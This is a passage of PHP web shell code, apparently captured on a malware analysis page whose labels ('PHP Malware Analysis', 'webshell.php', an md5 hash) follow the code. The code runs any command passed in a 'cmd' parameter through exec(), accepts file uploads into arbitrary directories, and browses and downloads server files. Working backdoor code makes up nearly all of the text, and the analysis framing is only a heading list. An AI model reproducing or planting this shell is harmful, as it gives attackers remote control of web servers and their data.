	if (is_file($dir)) {
		echo "enters";
		$file = $dir;
		echo $file;
	}
	$dir = './';
}
$dir = realpath($dir.'/'.$value);

$dirs = scandir($dir);
echo "<h2>Viewing directory " . $dir . "</h2>";
echo "\n<br><form action='".$_SERVER['PHP_SELF']."' method='GET'>";
echo "<input type='hidden' name='dir' value=".$dir." />";
echo "<input type='text' name='cmd' autocomplete='off' autofocus>\n<input type='submit' value='Execute'>\n";
echo "</form>";
echo "\n<br>\n<div class='navbar-form'><form action='".$_SERVER['PHP_SELF']."' method='POST' enctype='multipart/form-data'>\n";
echo "<input type='hidden' name='dir' value='".$_GET['dir']."'/> ";
echo "<input type='file' name='fileToUpload' id='fileToUpload'>\n<br><input type='submit' value='Upload File' name='submit'>";
echo "</div>";

if (isset($_POST['submit'])) {
	$uploadDirectory = $dir.'/'.basename($_FILES['fileToUpload']['name']);
	if (file_exists($uploadDirectory)) {
    	echo "<br><br><b style='color:red'>Error. File already exists in ".$uploadDirectory.".</b></br></br>";
	}
	else if (move_uploaded_file($_FILES['fileToUpload']['tmp_name'], $uploadDirectory)) {
		echo '<br><br><b>File '.$_FILES['fileToUpload']['name'].' uploaded successfully in '.$dir.' !</b><br>';
	} else {
		echo '<br><br><b style="color:red">Error uploading file '.$uploadDirectory.'</b><br><br>';

	}

}

if (isset($_GET['cmd'])) {
	echo "<br><br><b>Result of command execution: </b><br>";
	exec('cd '.$dir.' && '.$_GET['cmd'], $cmdresult);
	foreach ($cmdresult as $key => $value) {
		echo "$value \n<br>";
	}
}
echo "<br>";
?>

<table class="table table-hover table-bordered">
    <thead>
      <tr>
        <th>Name</th>
        <th>Owner</th>
        <th>Permissions</th>
      </tr>
    </thead>
    <tbody>
<?php
foreach ($dirs as $key => $value) {
	echo "<tr>";
	if (is_dir(realpath($dir.'/'.$value))) {
		echo "<td><a href='". $_SERVER['PHP_SELF'] . "?dir=". realpath($dir.'/'.$value) . "/'>". $value . "</a></td><td>". posix_getpwuid(fileowner($dir.'/'.$value))[name] . "</td><td> " . printPerms($dir) . "</td>\n";
	}
	else {
		echo "<td><a href='". $_SERVER['PHP_SELF'] . "?download=". realpath($dir.'/'.$value) . "'>". $value . "</a></td><td>". posix_getpwuid(fileowner($dir.'/'.$value))[name] ."</td><td> " . printPerms($dir) . "</td>\n";
	}
	echo "</tr>";
}
echo "</tbody>";
echo "</table>";


?>



</div>
</html>
PHP Malware Analysis

webshell.php

md5: 83ca057e1aca4b64d4db97f1914a298a

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
